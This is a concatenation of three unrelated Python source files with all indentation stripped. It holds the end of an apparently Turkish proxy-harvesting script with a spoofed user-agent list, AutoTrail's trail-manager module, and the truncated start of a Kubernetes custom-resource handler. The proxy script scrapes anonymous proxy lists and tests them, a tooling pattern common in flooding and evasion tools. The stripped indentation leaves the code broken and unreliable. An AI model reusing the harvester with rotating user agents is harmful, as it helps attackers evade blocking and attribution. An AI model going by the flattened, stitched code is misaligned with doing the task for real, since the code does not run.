"Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1",
"nook browser/1.0",
"Offline Explorer/2.5",
"Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30",
"Opera/7.50 (Windows ME; U) [en]",
"Opera/7.50 (Windows XP; U)",
"Opera/7.51 (Windows NT 5.1; U) [en]",
"Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr)",
"Opera/9.0 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.20 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.25 (Windows NT 6.0; U; en)",
"Opera/9.30 (Nintendo Wii; U; ; 2047-7; en)",
"Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en)",
"Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0",
"Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1",
"Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1",
"Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61",
"Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00",
"Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00",
"Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10",
"Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
"P3P Validator",
"Peach/1.01 (Ubuntu 8.04 LTS; U; en)",
"POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1",
"POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1",
"portalmmm/2.0 N410i(c20;TB) ",
"Python-urllib/2.5",
"SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3",
"SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"SearchExpress",
"SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr)",
"SEC-SGHX210/1.0 UP.Link/6.3.1.13.0",
"SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT100/R101",
"SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0",
"SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT68/R201A",
"SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US]",
"SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0",
"SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SuperBot/4.4.0.60 (Windows XP)",
"Uzbl (Webkit 1.3) (Linux i686 [i686])",
"Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1",
"W3C_Validator/1.305.2.12 libwww-perl/5.64",
"W3C_Validator/1.654",
"w3m/0.5.1",
"WDG_Validator/1.6.2",
"WebCopier v4.6",
"Web Downloader/6.9",
"WebZIP/3.5 (http://www.spidersoft.com)",
"Wget/1.9.1",
"Wget/1.9 cvs-stable (Red Hat modified)",
"wii libnup/1.0",
]
nurls = ["http://www.aliveproxy.com/high-anonymity-proxy-list/", "http://www.aliveproxy.com/anonymous-proxy-list/",
"http://www.aliveproxy.com/fastest-proxies/", "http://www.aliveproxy.com/us-proxy-list/", "http://www.aliveproxy.com/gb-proxy-list/",
"http://www.aliveproxy.com/fr-proxy-list/", "http://www.aliveproxy.com/de-proxy-list/", "http://www.aliveproxy.com/jp-proxy-list/",
"http://www.aliveproxy.com/ca-proxy-list/", "http://www.aliveproxy.com/ru-proxy-list/", "http://www.aliveproxy.com/proxy-list-port-80/",
"http://www.aliveproxy.com/proxy-list-port-81/", "http://www.aliveproxy.com/proxy-list-port-3128/", "http://www.aliveproxy.com/proxy-list-port-8000/",
"http://www.aliveproxy.com/proxy-list-port-8080/", "http://webanetlabs.net/publ/24", "http://www.proxz.com/proxy_list_high_anonymous_0.html",
"http://www.proxz.com/proxy_list_anonymous_us_0.html", "http://www.proxz.com/proxy_list_uk_0.html", "http://www.proxz.com/proxy_list_ca_0.html",
"http://www.proxz.com/proxy_list_cn_ssl_0.html", "http://www.proxz.com/proxy_list_jp_0.html", "http://www.proxz.com/proxy_list_fr_0.html",
"http://www.proxz.com/proxy_list_port_std_0.html", "http://www.proxz.com/proxy_list_port_nonstd_0.html", "http://www.proxz.com/proxy_list_transparent_0.html",
"http://www.proxylists.net/", "https://www.my-proxy.com/free-proxy-list.html","https://www.my-proxy.com/free-elite-proxy.html",
"https://www.my-proxy.com/free-anonymous-proxy.html", "https://www.my-proxy.com/free-transparent-proxy.html","https://jffjdjkbfek.000webhostapp.com/proxy.txt"]
def proxyget(url):
try:
req = urllib.request.Request(url)
req.add_header("User-Agent", random.choice(useragents))
sourcecode = urllib.request.urlopen(req, timeout = 10)
for line in sourcecode :
ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line))
ipf = list(filter(lambda x: x if not x.startswith("0.") else None, ip))
if ipf:
for x in ipf:
out_file = open("proxy.txt","a")
out_file.write(x+"\n")
out_file.close()
except:
print("\033[1;31m \nAh Bu Site Çalısmıyor.")
def proxyget2(url):
try:
req = urllib.request.Request((url))
req.add_header("User-Agent", random.choice(useragents))
sourcecode = urllib.request.urlopen(req, timeout=10)
part = str(sourcecode.read())
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("proxy.txt","a")
out_file.write(proxies)
out_file.close()
except:
print("\033[0;31m \nAh Bu Site Çalısmıyor.")
def blogspotget(url, word, word2):
try:
soup = BeautifulSoup(urllib.request.urlopen(url))
for tag in soup.find_all(word2, word):
links = tag.a.get("href")
result = urllib.request.urlopen(links)
for line in result :
ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line))
if ip:
for x in ip:
out_file = open("proxy.txt","a")
out_file.write(x+"\n")
out_file.close()
except:
print("\nAh Bu Site Çalısmıyor.")
def proxylist():
global proxies
print (" \nProxyler Kontrol Ediliyor")
proxies = open("proxy.txt").readlines()
proxiesp = []
for i in proxies:
if i not in proxiesp:
proxiesp.append(i)
filepr = open("proxy.txt", "w")
filepr.close()
filepr = open("proxy.txt", "a")
for i in proxiesp:
filepr.write(i)
print("\033[34m Var Olan Ipiler: %s" % (len(open("proxy.txt").readlines())))
print ("\033[1;32m\nProxylist Guncellendi!\n")
def proxycheckerinit():
global out_file
candidate_proxies = open("proxy.txt").readlines()
filedl = open("proxy.txt", "w")
filedl.close()
out_file = open("proxy.txt", "a")
for i in candidate_proxies:
threading.Thread(target=proxychecker, args=[i]).start()
def proxychecker(i):
proxy = 'http://' + i.strip()
proxy_support = urllib.request.ProxyHandler({'http' : proxy})
opener = urllib.request.build_opener(proxy_support)
urllib.request.install_opener(opener)
try:
urllib.request.urlopen("http://www.google.com", timeout=10)
print ("\033[32m %s Çalısıyor!\n\n" % proxy)
out_file.write(i)
except:
print ("\033[1;31m %s Ulasılamıyor.\n\n" % proxy)
def main():
try:
out_file = open("proxy.txt","w")
out_file.close()
print (" \nProxyler İndriliyor")
url = "http://free-proxy-list.net/"
proxyget2(url)
url = "https://www.us-proxy.org/"
proxyget2(url)
print("\033m[34m Var Olan İpiler: %s" % (len(open("proxy.txt").readlines())))
print ("\033[1;33m \nProxyler İndriliyor\n")
url = "http://www.proxyserverlist24.top/"
word = "post-title entry-title"
word2 = "h3"
blogspotget(url,word, word2)
url = "https://proxylistdaily4you.blogspot.com/"
word = "post-body entry-content"
word2 = "div"
blogspotget(url,word,word2)
print("\033[34m Var Olan İpiler: %s" % (len(open("proxy.txt").readlines())))
print ("\033[1;33m \nIndiriliyor...")
for position, url in enumerate(nurls):
proxyget(url)
print("\033[34m İndirme Tamamlandı: (%s/%s)\nVar Olan İpiler: %s" % (position+1, len(nurls), len(open("proxy.txt").readlines())))
print ("\033[34m \nDownloading from foxtools in progress...")
foxtools = ['http://api.foxtools.ru/v2/Proxy.txt?page=%d' % n for n in range(1, 6)]
for position, url in enumerate(foxtools):
proxyget(url)
print("\033[34m Current IPs in proxylist: %s" % (len(open("proxy.txt").readlines())))
proxylist()
print("\n")
while True:
choice = input("\033[35m \nProxyleri Kontrol Etmek İstermisin? [Y/n] > ")
if choice == 'Y' or choice == 'y' or choice == 'yes' or choice == 'Yes':
proxycheckerinit()
break
if choice == 'N' or choice == 'n' or choice == 'no' or choice == 'No':
exit(0)
else:
print ("\033[1;33m Dogru Sekilde Yaz.")
except:
print ("\033[1;31m \n\nAn HATA.")
if __name__ == '__main__':
while True:
choice = input("\033[35m \nProxyler İndirilsinmi? [Y/n] > ")
if choice == 'Y' or choice == 'y' or choice == 'yes' or choice == 'Yes':
main()
break
if choice == 'N' or choice == 'n' or choice == 'no' or choice == 'No':
proxycheckerinit()
break
else:
print ("\033[1;33m Dogru Sekilde Yaz.")
|
trail.py
|
"""Copyright 2017-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the
License. A copy of the License is located at
http://aws.amazon.com/apache2.0/
or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and
limitations under the License.
Trail management data structures and algorithms.
This module provides the Layer 1 of AutoTrail viz., the trail_manager. All layer 2 clients use the trail_manager to run
and manage a trail.
Everything below consists of helpers for the layer 2 clients. They can be used directly, but require understanding of the internals
of AutoTrail.
"""
import logging
from collections import namedtuple
from functools import partial
from multiprocessing import Process
from multiprocessing import Queue as ProcessQueue
from Queue import Empty as QueueEmpty
from socket import SHUT_RDWR
from time import sleep
from api import get_progeny, handle_api_call, log_step, search_steps_with_states
from autotrail.core.dag import is_dag_acyclic, Step, topological_traverse, topological_while
from autotrail.core.socket_communication import serve_socket
class AutoTrailException(Exception):
"""Base exception class used for the exceptions raised by AutoTrail.
This is typically extended by other exceptions with a more specific name.
"""
pass
class CyclicException(AutoTrailException):
"""Exception raised when a given trail definition contains cycles."""
pass
StepResult = namedtuple('StepResult', ['result', 'return_value'])
def step_manager(step, trail_environment, context):
"""Manage the running of a step.
This function is meant to be run in either a separate thread or process, hence the return value is found in the
result_queue.
This will:
1) Run the action function in the given Step.
2) Catch any exception it raises and return the str(Exception)
Return the result in the form of a StepResult object. The result is put in the result_queue.
The result_queue object is a multiprocessing.Queue like object and the only attribute used is put(<message>).
"""
try:
log_step(logging.debug, step, 'Starting run.')
return_value = step.action_function(trail_environment, context)
step_result = StepResult(result=step.SUCCESS, return_value=return_value)
log_step(logging.info, step, 'Run successful. Return value: {}.'.format(str(return_value)))
except Exception as e:
log_step(logging.exception, step,
'Exception encountered when running the step. Error message: {}.'.format(str(e)))
if step.pause_on_fail:
step_result = StepResult(result=step.PAUSED_ON_FAIL, return_value=str(e))
else:
step_result = StepResult(result=step.FAILURE, return_value=str(e))
step.result_queue.put(step_result)
def run_step(step, context):
"""Run a given step.
1. Starts a process to run the given step.
2. Creates queues to communicate with the process.
3. Changes the state of the Step to Step.RUN.
"""
log_step(logging.debug, step, 'Preparing objects to run.')
step.prompt_queue = ProcessQueue()
step.input_queue = ProcessQueue()
step.output_queue = ProcessQueue()
step.result_queue = ProcessQueue()
# Reset some attributes in case the Step is being re-run.
# Older values present can be confusing to the user, so remove them.
step.prompt_messages = []
step.input_messages = []
step.return_value = None
trail_environment = TrailEnvironment(step.prompt_queue, step.input_queue, step.output_queue)
step.process = Process(target=step_manager, args=(step, trail_environment, context))
log_step(logging.debug, step, 'Starting subprocess to run step.')
step.process.start()
step.state = step.RUN
def check_running_step(step):
"""Check if the step has completed by trying to obtain its result."""
try:
step_result = step.result_queue.get_nowait()
# Step has completed, reap it.
step.state = step_result.result
step.return_value = step_result.return_value
log_step(logging.debug, step,
'Step has completed. Changed state to: {}. Setting return value to: {}'.format(
step.state, step.return_value))
if step.skip_progeny_on_failure and step.state == step.FAILURE:
skip_progeny(step)
except QueueEmpty:
# Step is still running and hasn't returned any results, hence do nothing.
pass
finally:
collect_output_messages_from_step(step)
collect_prompt_messages_from_step(step)
DONE_STATES = [
# These states are done, therefore their downstream steps can be picked up.
Step.SUCCESS,
Step.SKIPPED,
]
IGNORE_STATES = [
# Ignore the following states as these steps or their downstream cannot be run.
Step.FAILURE,
Step.BLOCKED,
]
STATE_TRANSITIONS = {
# Mapping from step state to the corresponding transition functions.
# These functions produce side-effects by changing the state of the steps that are passed to them (if necessary).
Step.WAIT : run_step,
Step.RUN : lambda step, context: check_running_step(step),
Step.TOSKIP : lambda step, context: setattr(step, 'state', Step.SKIPPED),
Step.TOPAUSE : lambda step, context: setattr(step, 'state', Step.PAUSED),
Step.TOBLOCK : lambda step, context: setattr(step, 'state', Step.BLOCKED),
}
def trail_manager(root_step, api_socket, backup, delay=5, context=None, done_states=DONE_STATES,
ignore_states=IGNORE_STATES, state_transitions=STATE_TRANSITIONS):
"""Manage a trail.
This is the lowest layer of execution of a trail, a Layer 1 client that directly manages a trail.
Using this function directly requires no knowledge of the working of autotrail, but the requirements for using this
client should be fulfilled. They are detailed in the documentation below.
Arguments:
root_step -- A Step like object fulfilling the same contract of states it can be in. A trail is represented
by a DAG starting at root_step. A DAG can be created from a list of ordered pairs of Step
objects using the make_dag function provided in this module.
api_socket -- A socket.socket object where the API is served. All API calls are received and responded to via
this socket.
backup -- A call-back function to backup the state of the steps. This function should accept only one
parameter viz., the root_step. It will be called with every iteration of the main trail loop
to store the state of the DAG. Avoid making this a high latency function to keep the trail
responsive.
The return value of this function is ignored.
Ensure this function is exception safe as an exception here would break out of the trail
manager loop.
Keyword arguments:
delay -- The delay before each iteration of the loop, this is the delay with which the trail_manager
iterates over the steps it is keeping track of.
It is also the delay with which it checks for any API calls.
Having a long delay will make the trail less responsive to API calls.
context -- Any object that needs to be passed to the action functions as an argument when they are run.
done_states -- A list of step states that are considered to be "done". If a step is found in this state, it
can be considered to have been run.
ignore_states -- A list of step states that will be ignored. A step in these states cannot be traversed over,
i.e., all downstream steps will be out of traversal and will never be reached (case when a
step has failed etc).
state_transitions -- A mapping of step states to functions that will be called if a step is found in that state.
These functions will be called with 2 parameters - the step and context. Their return value is
ignored. These functions can produce side effects by altering the state of the step if needed.
Responsibilities of the manager include:
1) Run the API call server.
2) Iterate over the steps in a topological traversal based on the done_states, ignore_states and state_transitions
data structures.
3) Invoke the call-back backup function to save the trail state.
4) Return when the API server shuts down.
"""
logging.debug('Starting trail manager.')
# Preparing a list of steps as these are frequently needed for serving the API calls, but topological traversal
# is expensive whereas, iteration over a list is not.
steps = list(topological_traverse(root_step))
# The trail_manager uses the topological_while function, which provides a way to traverse vertices in a topological
# order (guaranteeing the trail order) while allowing the trail_manager to control the flow.
# The topological traversal has the effect that a step is not acted upon, unless all its parents are done.
# The done_check and ignore_check call-backs allow us to tell the topological_while function if a step can be
# considered done or not.
done_check = lambda step: step.state in done_states
ignore_check = lambda step: step.state in ignore_states
step_iterator = topological_while(root_step, done_check, ignore_check)
while True:
# It is important to first serve API calls before working on steps because we want a user's request to
# affect any change before the trail run changes it.
to_continue = serve_socket(api_socket, partial(handle_api_call, steps=steps))
if to_continue is False:
logging.info('API Server says NOT to continue. Shutting down.')
api_socket.shutdown(SHUT_RDWR)
break
step = next(step_iterator, None)
if step and step.state in state_transitions:
state_transitions[step.state](step, context)
backup(root_step)
sleep(delay)
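# Hypothetical usage sketch (action function names, socket setup and the no-op backup
# are assumptions, not part of this module): a Layer 2 client would typically build a
# DAG with make_dag, create a listening socket for the API, and hand both to
# trail_manager.
#
#     import socket
#
#     root_step = make_dag([(Step(prepare), Step(deploy)), (Step(deploy), Step(verify))])
#     api_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
#     api_socket.bind('/tmp/autotrail_api.sock')
#     api_socket.listen(1)
#     trail_manager(root_step, api_socket, backup=lambda root: None, delay=2)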
def skip_progeny(step):
"""Skip the progeny of the given step."""
for step in search_steps_with_states(get_progeny([step]), states=[Step.WAIT, Step.TOPAUSE]):
step.state = Step.SKIPPED
log_step(logging.info, step, (
'Skipping step as one of its previous steps failed and it had '
'skip_progeny_on_failure=True.'))
class TrailEnvironment(object):
"""Class that provides a run-time environment to the action functions to interact with AutoTrail.
Sometimes, at runtime, an action function may need to use some mechanisms of AutoTrail, all such mechanisms will be
provided as methods in this class.
Arguments:
prompt_queue -- multiprocessing.Queue like object which is used to send prompt messages to the user.
An action function can write to this queue and the messages will be conveyed to the user.
This is different from the output_queue in that messages in this queue will be expecting a reply.
This is like an input prompting resource for the action function, hence the name.
input_queue -- multiprocessing.Queue like object which is used to send messages to the action function.
This is like an input source for the action function, hence the name.
output_queue -- multiprocessing.Queue like object which is used to send messages to the user.
An action function can write to this queue and the messages will be conveyed to the user.
This is like an output resource for the action function, hence the name.
Messages in this queue are considered to be FYI and do not need a reply.
"""
def __init__(self, prompt_queue, input_queue, output_queue):
self.prompt_queue = prompt_queue
self.input_queue = input_queue
self.output_queue = output_queue
def input(self, prompt, timeout=None):
"""Request input from the user.
This method sends the 'prompt' as a message to the user and blocks until the user replies to the Step with the
response.
Arguments:
prompt -- String - Message to be shown to the user.
Keyword Arguments:
timeout -- int - Time in seconds that this method will block for an answer from the user.
Defaults to None - block indefinitely.
"""
self.prompt_queue.put(prompt)
return self.input_queue.get(timeout=timeout)
def output(self, message):
"""Send a message to the user.
This method sends the 'message' to the user. This method does not block.
Arguments:
message -- String - Message to be shown to the user.
"""
self.output_queue.put(message)
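# Illustrative action function (hypothetical, not part of AutoTrail) showing how the
# TrailEnvironment above is typically used from inside a step:
#
#     def confirm_and_copy(trail_environment, context):
#         answer = trail_environment.input('Proceed with the copy? (yes/no)')
#         if answer != 'yes':
#             return 'Copy skipped by user'
#         trail_environment.output('Copy started.')
#         return 'Copy finished'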
def collect_output_messages_from_step(step):
"""Collect all output messages sent by the action function in Step.
When an action function wants to send a message, it will put them in the output_queue provided to it.
This function reads all messages in the Queue and updates the Step.output_messages attribute of Step with the newly
collected messages.
Arguments:
step -- An object of type Step or similar.
Post-condition:
The following attributes of the given Step object will be updated:
output_queue -- will be drained of any messages.
output_messages -- will be appended with the messages obtained from output_queue.
"""
messages = []
while True:
try:
message = step.output_queue.get_nowait()
messages.append(message)
log_step(logging.info, step, 'Output message sent: {}'.format(str(message)))
except QueueEmpty:
break
step.output_messages.extend(messages)
def collect_prompt_messages_from_step(step):
"""Collect all prompt messages sent by the action function in Step.
When an action function wants to prompt the user for some input, it sends a message into the prompt_queue provided
to it.
This function reads all messages in the prompt Queue and updates the following attribute of Step with the
collected messages:
Step.prompt -- This is a list of all messages sent by the step so far.
Arguments:
step -- An object of type Step or similar.
Post-condition:
The following attributes of the given Step object will be updated:
prompt_queue -- will be drained of any messages.
prompt_messages -- will be appended with the messages obtained from prompt_queue.
"""
messages = []
while True:
try:
message = step.prompt_queue.get_nowait()
messages.append(message)
log_step(logging.info, step, 'Prompt message sent: {}'.format(str(message)))
except QueueEmpty:
break
step.prompt_messages.extend(messages)
def make_dag(trail_definition):
"""Convert a given trail definition (ordered pair representation) into a DAG.
Returns:
root_step -- obtained from the Left-hand-side of the first ordered pair.
Raises:
CyclicException -- If the trail definition contains cycles.
"""
# A trail definition using ordered pair approach will consist of a list of ordered pairs of the form:
# [
# (parent_step, child_step),
# ...
# ]
root_step, child_step = trail_definition.pop(0)
root_step.add_child(child_step)
for parent_step, child_step in trail_definition:
parent_step.add_child(child_step)
if not is_dag_acyclic(root_step):
raise CyclicException('The trail contains cycles.')
assign_sequence_numbers_to_steps(root_step)
return root_step
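# Minimal usage sketch (step and action function names are hypothetical):
#
#     step_a = Step(action_a)
#     step_b = Step(action_b)
#     step_c = Step(action_c)
#     root = make_dag([(step_a, step_b), (step_a, step_c)])
#     # root is step_a; every step now carries a sequence number in step.tags['n'].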
def assign_sequence_numbers_to_steps(root_step, tag_name='n'):
"""Assign unique numbers to each step in a trail.
A Step is a wrapper around an action function. However, for a given trail, Steps are unique while action_functions
may not be. E.g.,
def action_function_a(context):
pass
step_a1 = Step(action_function_a)
step_a2 = Step(action_function_a)
While the same action function is being referred to by the steps, they are different objects.
We need a way to uniquely refer to a step. While the 'name' tag allows us to refer to a Step using its action
function name, it is not unique.
This function iterates over the DAG in topological order and assigns a simple tag to each step
(calling it 'n' by default).
The assignment starts at the root step, which gets 0; the last step in topological order gets the highest number.
Arguments:
root_step -- A Step like object which is the starting point of the DAG.
tag_name -- The name of the tag.
Defaults to 'n'.
"""
for number, step in enumerate(topological_traverse(root_step)):
step.tags[tag_name] = number
|
k8scrhandler.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved.
#
# This file is part of ewm-cloud-robotics
# (see https://github.com/SAP/ewm-cloud-robotics).
#
# This file is licensed under the Apache Software License, v. 2 except as noted
# otherwise in the LICENSE file (https://github.com/SAP/ewm-cloud-robotics/blob/master/LICENSE)
#
"""K8s custom resource handler for robcoewmordermanager."""
import os
import re
import logging
import copy
import time
import functools
import threading
from concurrent.futures import ThreadPoolExecutor, Future
from collections import defaultdict, OrderedDict
from typing import DefaultDict, Dict, Callable, List, Optional, OrderedDict as TOrderedDict
from kubernetes import client, config, watch
from kubernetes.client.rest import ApiException
_LOGGER = logging.getLogger(__name__)
TOO_OLD_RESOURCE_VERSION = re.compile(r"too old resource version: .* \((.*)\)")
def k8s_cr_callback(func: Callable) -> Callable:
"""
Decorate a method as a K8s CR callback.
Works only for K8sCRHandler and its child classes.
"""
@functools.wraps(func)
def decorated_func(self, *args, **kwargs):
"""Provide automatic locking of CRs in process by this method."""
# Ensure that signature of K8sCRHandler._callback stays the same
name = args[0]
operation = args[2]
with self.cr_locks[name]:
_LOGGER.debug('CR "%s" locked by operation "%s"', name, operation)
try:
return func(self, *args, **kwargs)
finally:
if operation == 'DELETED':
self.cr_locks.pop(name, None)
_LOGGER.info('Method "%s" is decorated as K8s callback method', func)
return decorated_func
def parse_too_old_failure(message: str) -> Optional[int]:
"""
Parse stream watcher 'too old resource version' error.
According to https://github.com/kubernetes-client/python/issues/609.
"""
result = TOO_OLD_RESOURCE_VERSION.search(message)
if result is None:
return None
match = result.group(1)
if match is None:
return None
try:
return int(match)
except (ValueError, TypeError):
return None
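# Example of the intended parsing (the exact message text is an assumption based on
# the issue linked in the docstring above):
#
#     >>> parse_too_old_failure('too old resource version: 1 (3005)')
#     3005
#     >>> parse_too_old_failure('some other error') is None
#     True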
class K8sCRHandler:
"""
Handle K8s custom resources.
One instance represents one controller watching changes on a single custom
resource definition.
"""
VALID_EVENT_TYPES = ['ADDED', 'MODIFIED', 'DELETED', 'REPROCESS']
REQUEST_TIMEOUT = (5, 30)
def __init__(self,
group: str,
version: str,
plural: str,
namespace: str,
template_cr: Dict,
labels: Dict) -> None:
"""Construct."""
if 'KUBERNETES_PORT' in os.environ:
_LOGGER.info('%s/%s: Handler starting "incluster_config" mode', group, plural)
config.load_incluster_config()
else:
_LOGGER.info('%s/%s: Handler starting "kube_config" mode', group, plural)
config.load_kube_config()
# Instantiate required K8s APIs
self.core_api = client.CoreV1Api()
self.crd_api = client.ApiextensionsV1beta1Api()
self.co_api = client.CustomObjectsApi()
# K8s stream watcher
self.watcher = watch.Watch()
# Configs set to specify which CRs to monitor/control
self.group = group
self.version = version
self.plural = plural
self.namespace = namespace
# Identify from CRD which method should be used to update CR status
self.get_status_update_method()
self.label_selector = ''
for k, val in labels.items():
self.label_selector += k + '=' + val + ','
self.label_selector = self.label_selector[:-1]
# Latest resource version processed by watcher
self.resv_watcher = ''
# Error counter for watcher
self.err_count_watcher = 0
# CR Cache
self._cr_cache: Dict[str, Dict] = {}
self._cr_cache_lock = threading.Lock()
self._cr_cache_initialized = False
# Callback stack for watch on cr
self.callbacks: Dict[
str, TOrderedDict[str, Callable]] = self.get_callback_dict()
self.robot_callbacks: Dict[
str, Dict[str, TOrderedDict[str, Callable]]] = {}
self.callbacks_lock = threading.Lock()
# JSON template used while creating custom resources
self.raw_cr = template_cr
# Waiting time to reprocess all custom resources if the reprocess function is enabled
self.reprocess_waiting_time = 10.0
# Lock objects to synchronize processing of CRs
self.cr_locks: DefaultDict[str, threading.Lock] = defaultdict(threading.Lock)
# Dict to save thread exceptions
self.thread_exceptions: Dict[str, Exception] = {}
# Init threads
self.watcher_thread = threading.Thread(target=self._watch_on_crs_loop, daemon=True)
self.synchronize_thread = threading.Thread(
target=self._synchronize_cache_loop, daemon=True)
self.reprocess_thread = threading.Thread(target=self._reprocess_crs_loop, daemon=True)
# Control flag for thread
self.thread_run = True
self.executor = ThreadPoolExecutor(max_workers=1)
@staticmethod
def get_callback_dict() -> Dict[str, TOrderedDict[str, Callable]]:
"""Get a dictionary to store callback methods."""
callbacks: Dict[
str, TOrderedDict[str, Callable]] = {
'ADDED': OrderedDict(),
'MODIFIED': OrderedDict(),
'DELETED': OrderedDict(),
'REPROCESS': OrderedDict()
}
return copy.deepcopy(callbacks)
def get_status_update_method(self) -> None:
"""
Get status update method from CRD.
Depends on whether the status subresource is set or unset in the CRD.
"""
cls = self.__class__
name = '{}.{}'.format(self.plural, self.group)
